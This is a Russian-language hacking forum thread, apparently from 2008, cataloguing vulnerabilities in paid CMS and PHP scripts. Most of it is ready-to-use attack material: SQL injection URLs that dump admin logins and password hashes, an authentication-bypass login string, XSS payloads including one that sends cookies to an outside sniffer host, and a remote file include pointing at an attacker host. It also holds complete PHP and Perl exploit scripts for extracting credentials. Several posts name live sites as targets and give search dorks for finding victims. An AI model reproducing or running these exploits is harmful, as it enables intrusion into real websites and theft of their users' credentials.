Просмотр полной версии : Обзор уязвимостей в платных CMS
VistaCMS
Оф.сайт: http://www.vistacms.ru
Стоимость (в руб.): 13000-42000 o.O
------------------------------------------------
Раскрытие путей:
http://www.vistacms.ru/modules/kerne'l/
/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php
SQL-injection
Администраторская панель:
http://www.vistacms.ru/admin/
Логин: 1' or 1=1/*
Пароль: antichat.ru
Клиенты:
http://www.vistacms.ru/clients/
Автор: ZAMUT (c)
P.S.
Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.
UMI.CMS
Оф.сайт: www.umi-cms.ru
Стоимость (в руб.): 2990-29990
------------------------------------------
XSS(Активная)
Настройки ->
Уязвимые поля:
Фамилия
Имя
Отчество
<script>alert(document.cookie)</script>
Автор: ZAMUT (c)
Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...
цена ABO CMS на офф. сайте достигает 30000 рублей.
На этом движке работают крупные инет-магазины, банки, и т.д.
вот сплоит ТУТ (http://for-hack.narod.ru/bag.php) написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать...
Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте
halkfild
13.01.2008, 01:41
S.Builder
Разработчик CMS CBS-Group
Номер версии S.Builder 3.756
Лицензия платная
Сайт www.sbuilder.ru
Демо-версия www.demo.sbuilder.ru
Функциональность портал
Стоимость (в руб.) от 2235 до 44700 руб.
для теста в вебе создают акк на сутки
SQL-injection
20 полей
http://cmssite/more.php?bc_tovar_id=2+order+by+20/*'
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,version(),user(),databa se()),10,11,12,13,14,15,16,17,18,19,20/*'
системная инфа
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,table_schema,table_name ),10,11,12,13,14,15,16,17,18,19,20+from+informatio n_schema.tables/*'
пользователи
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ binn_users/*'
название не смотрел ;) но мона через базу глянуть
VDNH
Оф. сайт http://www.vdnh.ru/
Лицензия - платная
Стоимость- от 6750- 176625
уязвимость - xss активная, пассивная
<script>alert('helloworld')</script>
также бажные у них гостевые книги.
Multiple Vulns in Bitrix CMS
Версия системы и история обновления
Vulnerable: Bitrix Site Manager 4.1.x
Exploit:
http://www.bitrix.ru/bitrix/updates/updater.log
XSS в редиректе:
Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.
Раскрытие пути
Vulnerable: Bitrix Site Manager 4.0.x
Exploit:
http://host/bitrix/templates/.default/subscribe/subscr_form.php
http://host /bitrix/php_interface/dbquery_error.php
PHP Include
Vulnerable: Bitrix Site Manager 4.0.x
Exploit:
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
"http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/
Amiro.CMS
сайт: amiro.ru
XSS (passive)
Сплоентс:
/saleoffset=saleoffset=<script>alert(document.cookie)</script>
/blabla<script>alert(document.cookie)</script>
by me +)
halkfild
09.02.2008, 04:20
Mix Systems
vendor:http://mixsystems.com.ua
price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."
SQL injection
plugin:katalog
EX
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/*
version::user::database
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,versio n(),user(),database()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
users id::login::pwd::email
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id ,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18 +from+mix_users/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,lo gin,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+fr om+mix_users+limit+1,1/*
plugin=photogall
Ex
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11
version::user::database
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5,concat_ws(0x3a3a,versi on(),user(),database()),7,8,9,10,11,12/*&cat=11
users id::login::pwd::email
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id, login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
(c) halkfild
написал сплоит на CURL /*быстрее чем сокеты*/
<?
echo "\n";
echo "-------------------------Mix Systems CMS--------------------------"."\n";
echo "-----------------------coded by : halkfild------------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=4){
echo " Usage: php ".$argv[0]." host type num_records\n";
echo " host: Your target ex www.target.com \n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
echo " num_records: number or returned records(if 0 - return all)\n";
echo " example: php script.php site.com 10\n";
echo "\n";
exit;
}
$host=$argv[1];
$type=$argv[2];
$count=$argv[3];
if ($argv[2]==1) {
$query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR( 64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13 ,14,15,16,17,18+from+mix_users+limit+";
$end=",1/*";
}
elseif ($argv[2]==2) {
$query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHA R(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11 ,12+from+ng_users+limit+";
$end=",1/*&cat=11";
}
else {
echo " incorrect parameter #2=".$argv[2]."\n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
exit;
}
$site=$host.'/'.$query;
$pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';
$i=0;
if(function_exists('curl_init'))
{
while(1) {
$ch = curl_init("http://".$site.$i.$end);
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$res=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");
if(preg_match_all($pattern,$res,$out)) {
echo "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";
$i++;
$out=null;
}
else break;
if ($count!=0 && $i>$count) break;
}
echo ("Finish. /* ".$i." records*/ \n");
}
else
exit("Error:Libcurl isnt installed \n");
?>
ExpiCMS
www.expi-cms.ru
стоимость
1. Лицензия 1 год - 6 900 руб.
2. Лицензия 3 года - 12 900 руб.
3. Неограниченная лицензия - 17 490 руб
Пассивная xss
вход в админку www.expi-cms.ru/cms/login.php
в логин и пароль вставляеем например такую конструкцию :)
</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>
так например на marypoppinscafe.ru/cms/login.php выдает некотрую интересную информацию в частности User - mary_poppins DataBase - cms_express_oksana_mary_poppins
big_BRAT
16.03.2008, 20:22
Shop-Script
Разработчик Articus dev. group
Лицензия платная
Сайт www.shop-script.ru/
Демо-версия www.demo.shop-script.ru/premium
Функциональность e-магазин
Стоимость (в руб.) от 0 до 5450 руб.
SQL injection
уязвимый скрипт invoice_phys.php
уязвимый парамерт order_time=
данные передаются кодированные в base64; возможен только посимвольный перебор
Пример уязвимого куска кода:
$_GET["orderID"] = (int) $_GET["orderID"];
$sql = 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'
WHERE orderID='.$_GET["orderID"].' AND
order_time="'.base64_decode($_GET["order_time"]).'" AND
customer_email="'.base64_decode($_GET["customer_email"]).'"';
Пример:
2008-03-16 14:24:11" or 1=1/*
Рабочий "код":
2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*
который нужно прогнать через base64_encode и передать скрипту.
Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде
Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22
Приблизительно 1500 стр...
Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html
Уязвимость не где не вылаживал, античат первый))
showNewsItem.php
Exploit:
showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,admin_id,user_name,password)+from+administ rator--
Пассы без шифрования
/admin/index.php
тамже
showGallery.php?pagetitle=Gallery&category=1+and+1=0+union+select+concat(user_name,0 x3a,password)+from+administrator/*
.Begemot.
14.06.2008, 12:47
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability +==--
--==+=============================================== =====================================+==--
- dreaming of necessity is reason to comply -
[+] Info:
[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] EspSeC & Hack0wn!.
[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php
[~] /jobseekers/JobSearch.php (search module)
[+] Exploit:
[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*
* In memory of rgod
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+=============================================== =====================================+==--
[+] [The End]
# milw0rm.com [2008-06-14]
milw0rm.com [2008-06-14]
Ded MustD!e
19.06.2008, 22:15
Пассивная XSS в ARTUS-master
Уязвимо поле поиска.
"><script>alert()</script>
например тут http://artus.ru/ :)
baltazar
18.07.2008, 13:44
CNCat
XSS:
Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php
http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Не уверен, что платная CMS, но тем не менее :)
SQL-inj в Siteframe CMS
В скрипте folder.php, параметре id.
http://site.com/folder.php?id=[sql]
Боевой пример:
http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5, 6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11 +from+users--
================================================== ==============================
|| K-Links Directory SQL-INJECTION, XSS
================================================== ==============================
Application: K-Links Directory
--------------
Website: http://turn-k.net/k-links
-----------
Version: Platinum (All)
----------
About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------
Googledork: Powered By K-Links Directory
---------------
Demo: http://klinksdemo.com
--------
Date: 24-07-2008
-------
Description:
---------------
Множественные SQL-Injection. Активные и пассивные XSS.
[ SQL-INJECTION ]
http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]
===>>> Exploit:
http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4 ,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 ,3,4,5,6,7,8 from platinum_admins where a_id=1/*
/* Admin Login - http://host/admin
Далее, через Manage Templates получаем веб-шелл. */
[ ACTIVE XSS ]
*) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.
*) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.
[ PASSIVE XSS :) ]
http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>
Author: Corwin
---------
Contact: corwin88[dog]mail[dot]ru
-----------
p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода.
================================================== ==============================
|| Dating 3 PHP Script SQL-INJECTION
================================================== ==============================
Application: E-topbiz Dating 3 PHP Script
------------
Version: All
--------
Website: http://e-topbiz.com/oprema/pages/dating3.php
--------
Demo: http://e-topbiz.com/trafficdemos/dating3
-----
About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------
Date: 01-08-2008
-----
[ VULNERABLE CODE ]
members/mail.php
@Line:
142: if($action==inbox) {
143: $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");
150: if($action==veiw) {
151: $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");
===>>> Exploit:
http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*
Author: Corwin
-------
Contact: corwin88[dog]mail[dot]ru
--------
============================
|| PPVCHAT ACTIVE XSS
============================
Application: PPVCHAT
------------
Website: http://ppvchat.com/
--------
Version: All
--------
About: Pay-per-view adult video chat software. Price 999$.
------
Googledork: Copyright © 2006 PPVChat.com
-----------
Date: 05-07-2008
-----
Description:
------------
При регистрации новых пользователей/моделей нет фильтрации полей.
===>>> Exploit:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
Author: Corwin
-------
Contact: corwin88[dog]mail[dot]ru
--------
================================================== ==============================
|| E-topbiz Payment Processor 2 SQL-INJECTION
================================================== ==============================
Application: E-topbiz Payment Processor 2
------------
Version: 2.0
--------
Website: http://e-topbiz.com/oprema/pages/pproc2.php
--------
Demo: http://e-topbiz.com/trafficdemos/payment2/
-----
About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.
Date: 01-08-2008
-----
[ SQL-INJECTION ]
http://host/shop.htm?cid=-1[SQL]
===>>> Exploit:
http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())
Author: Corwin
-------
Contact: corwin88[dog]mail[dot]ru
--------
================================================== ==============================
|| Recipe Script SQL-INJECTION
================================================== ==============================
Application: Recipe Script
------------
Version: 6.0
--------
Website: http://fivedollarscripts.com
--------
Demo: http://recipebag.com
-----
Date: 03-08-2008
-----
[ VULNERABLE CODE ]
viewrecipe.php
3: $sql="select * from recipe where recipeid=$recid";
4: $res=mysql_query($sql);it");
259: $result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid");
260: if(mysql_num_rows($result))do it");
===>>> Exploit:
http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3,4,5,6,7,8,9 from recipesadmin.php
// Admin Login - http:/host/admin2
Greetzz !!! Форб, с отцовством бро! :-)!!
Author: Corwin
-------
Contact: corwin88[dog]mail[dot]ru
--------
================================================== ==============================
|| Bartender Drinks SQL-INJECTION
================================================== ==============================
Application: Bartender Drinks
------------
Version: All
--------
Website: http://fivedollarscripts.com
--------
Demo: http://fivedollarscripts.com/drinks/
-----
Date: 04-08-2008
-----
[ VULNERABLE CODE ]
viewdrinks.php
6: if($bgid=="")
{
$sql="select * from drink order by upldate desc";
}
else
{
12: $sql="select * from drink where categoryid=$bgid order by upldate desc";
}
viewdrink.php
3: $sql="select * from drink where drinkid=$recid";
$res=mysql_query($sql);
238: $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid");
===>>> Exploit:
http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/*
// Admin Login - http:/host/admin2
by me
baltazar
11.08.2008, 14:12
XSS:
http://site/highlight/index.html?url=http://forum.antichat.ru.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest
Directory Traversal:
http://site/help/syntax.html?la=/../../index
http://site/help/searchtips.html?la=/../../index
http://site/help/refine.html?la=/../../index
http://site/help/special.html?la=/../../index
http://site/help/boolean.html?la=/../../index
http://site/help/meta.html?la=/../../index
Local File Inclusion:
http://site/help/syntax.html?la=/../query
http://site/help/searchtips.html?la=/../query
http://site/help/refine.html?la=/../query
http://site/help/special.html?la=/../query
http://site/help/boolean.html?la=/../query
http://site/help/meta.html?la=/../query
baltazar
11.08.2008, 14:23
XSS:
http://site/shop?se_namedomen=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
Уязвимость в скрипте shop в параметре se_namedomen
http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
В скрипте thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text
http://site/registration?login=%22%3E%3Cscript%3Ealert(documen t.cookie)%3C/script%3E
В скрипте registration в параметрах login, email, first_name, last_name.
Уязвимости на офф.сайте движка http://www.siteedit.ru
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E
http://www.siteedit.ru/thanks?autoreply_text=%22%3E%3Ca%20href=http://forum.antichat.ru%3Eantichat%3C/a%3E
http://www.siteedit.ru/registration?last_name=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E
SoSo News Express Pro 2.0.4. Blind SQL Injection Exploit (к сожалению, поковыряться удалось только в этой версии)
Уязвимый код:
В файле includes/info_home.php:
$this->client_ip=!empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ( !empty($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : (!empty($REMOTE_ADDR) ? $REMOTE_ADDR : '' ));
В файле modules/ajax/ajax_statistic.php:
$DB->query("SELECT session_time FROM ". $DB->prefix ."stat_session WHERE client_ip='". $Info->client_ip ."' AND session_time>=". $update_time ." ORDER BY session_time DESC LIMIT 0,1");
Как видим, поле X_FORWARDED_FOR заголовка запроса, не фильтруется.
Т.к. полученый Sql inj - слепой, но с выводом ошибки, используем запрос:
X_FORWARDED_FOR:-1' OR client_ip=IF(ascii(substring((SELECT user_password FROM news_user WHERE user_id=1),[POS],1))=[CHARCODE],'1',(SELECT 1 UNION SELECT 2))/*
Если запрос, НЕ вернул ошибку "Subquery returns ...", то на этой позиции находится символ [CHARCODE].
Сплоит запускать из коммандной строки, вот так: soso2sql.php http://site.com/ 1
Результат: md5(password).
Собственно код:
<?
//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";
set_time_limit(0);
ignore_user_abort(1);
function send_xpl($url, $xpl){
global $id;
global $cookie;
$u=parse_url($url);
$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}
if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}
$url=$argv[1];
$id=$argv[2];
echo $url."\r\n";
echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=97;$j<=102;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if (!$flag)
die("\r\nExploit failed\r\n");
}
echo " [DONE]\r\n";
?>
Скачать можно тут: http://www.x2b.ru/get/1401
З.Ы.
Проблема с X_FORWARDED_FOR присутствует и на официальном сайте, а значит наверняка и в более новых версиях.
Пример:
GET http://www.sosovn.com/index.php?mod=contact&act=send
Host: www.sosovn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
X_FORWARDED_FOR: test'
Keep-Alive: 300
Connection: keep-alive
Ну и раскрытие пути: http://site/ajax.php (для версии 2.0.4)
Огромное спасибо за выложеный баг. Я правда столкнулся с проблемой нахождения логина, пока не очень получаеться, немогли бы вы показать как вытащить логин админа?
спасибо!
Вот тебе версия которая после подбора хеша подбирает и логин админа. Подбирает в диапазоне [a-Z,0-9], если будет мало, внимательно поправь значения кодов символов во втором цикле for (в тех что внутри for($i=1;$i<=32;$i++) ).
<?
//SoSo News Express Pro v.2.0.4 Blind SQL Injection Exploit by Qwazar
//Greets: antichat.ru & Orgasm at #antichat
$prefix="news_";
set_time_limit(0);
ignore_user_abort(1);
function send_xpl($url, $xpl){
global $id;
global $cookie;
$u=parse_url($url);
$req ="GET ".$u['path']."ajax.php?mod=ajax_statistic HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="X_FORWARDED_FOR: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select user_password from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}
function xpl2($condition, $pos){
global $id, $prefix;
$xpl="-1' or client_ip=if(ascii(substring((select username from ".$prefix."user where user_id=$id),$pos,1))$condition,'1',(select 1 union select 2)) /* ";
return $xpl;
}
if($argc<2)
{
echo "==================\r\n";
echo "Using soso2sql.php url target_id\r\n target_id - id of target member\r\n\r\n\r\nEx.: soso2sql.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}
$url=$argv[1];
$id=$argv[2];
echo $url."\r\n";
echo "Trying to get passhash: ";
//get md5 pass
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=97;$j<=102;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if (!$flag)
die("\r\nExploit failed\r\n");
}
echo " [DONE]\r\n";
echo "Trying to get username: ";
for($i=1;$i<=32;$i++){
$flag = 0;
for($j=48;$j<=57;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); if($j!=48) {echo chr(8);} echo chr($j); $flag=1; break; }
else {if($j!=48) {echo chr(8);} echo chr($j);}
}
if($flag!=1) {
for($j=65;$j<=90;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if($flag!=1) {
for($j=97;$j<=122;$j++){
if(!preg_match('/Subquery returns/', send_xpl($url, xpl2('='.$j,$i)))){ $secret.=chr($j); echo chr(8).chr($j); $flag=1; break; }
else {echo chr(8).chr($j);}
}
}
if($flag!=1) {
echo chr(8);
break;
}
}
echo " [DONE]\r\n";
?>
Скачать можно с: http://www.x2b.ru/get/1426
~!DoK_tOR!~
22.08.2008, 23:02
print.php
Vuln code:
$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
http://milw0rm.com/exploits/6284
(c) ~!Dok_tOR!~
~!DoK_tOR!~
04.09.2008, 07:09
PlayCMS <= 2.0 SQL Injection
Type: Game Script
Price: $20
URL: www.playcms.com
Condition: magic_quotes_gpc = Off
Exploit:
http://localhost/[installdir]/game.php?gameid=-1'+union+select+1,user(),version(),4,5,6,database( ),8/*
http://localhost/[installdir]/index.php?gameid=-1'+union+select+1,2,3,4,5,6,7,8/*
(c) ~!Dok_tOR!~
Vastal I-Tech CMS
Оф.сайт: vastal.com (http://vastal.com)
Дата: 05.09.2008
Первоисточник: milw0rm.com (http://milw0rm.com)
Описание: Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)
Уязвимые компоненты:
Shaadi Zone 1.0.9 (tage) SQL Injection (http://milw0rm.com/exploits/6385)
Cosmetics Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6382)
Freelance Zone (coder_id) SQL Injection (http://milw0rm.com/exploits/6381)
Mag Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6380)
MMORPG Zone (game_id) SQL Injection (http://milw0rm.com/exploits/6379)
Jobs Zone (news_id) SQL Injection (http://milw0rm.com/exploits/6378)
DVD Zone (cat_id) SQL Injection (http://milw0rm.com/exploits/6376)
Share Zone (id) SQL Injection (http://milw0rm.com/exploits/6375)
Toner Cart (id) SQL Injection (http://milw0rm.com/exploits/6374)
Visa Zone (news_id) SQL Injection (http://milw0rm.com/exploits/6373)
Agent Zone (ann_id) SQL Injection (http://milw0rm.com/exploits/6371)
От меня:
Компонент: Mag Zone (mag_id)
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
my ($ua,$answ);
&usage;
if(!$ARGV[2]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[2]";}
print "\n\n[~]Waiting...\n[~]Getting data -- [ user_name, password ]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727");
if($ARGV[2]){
$ua->proxy('http',"http://".$ARGV[2]."/");
}
$answ = $ua->get("http://$ARGV[0]/view_mag.php?mag_id=-1+union+select+1,2,3,concat(0x3a3a3a,user_name,0x3 a,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+members/*")->content;
$answ =~m#:::(.+):(.+):::#;
if(!$1) {print "\nExploit failed!";}
else { print "\n\nlogin : $1\npassword : $2\n"; }
sub usage
{
print q
{
################################################## ####################
Vastal I-Tech Mag Zone (mag_id) SQL Injection Exploit
INFO:
Author: ZAMUT
Vuln: mag_id=
Homepage: http://antichat.ru
Usage: exploit.pl [path] [proxy]
Example:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080
################################################## ####################
};
}
Используется так:
perl exploit.pl [полный путь до скрипта] [прокси:порт]
Пример:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080 или
perl exploit.pl www.vastal.com/mag
Поддержка только http - прокси.
E-phpscripts CMS Arya
Оф.сайт: ephpscripts.com (http://ephpscripts.com)
Дата: 09.09.08
Автор: ZAMUT
Дорк: inurl:article.php es_id
Описание: Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
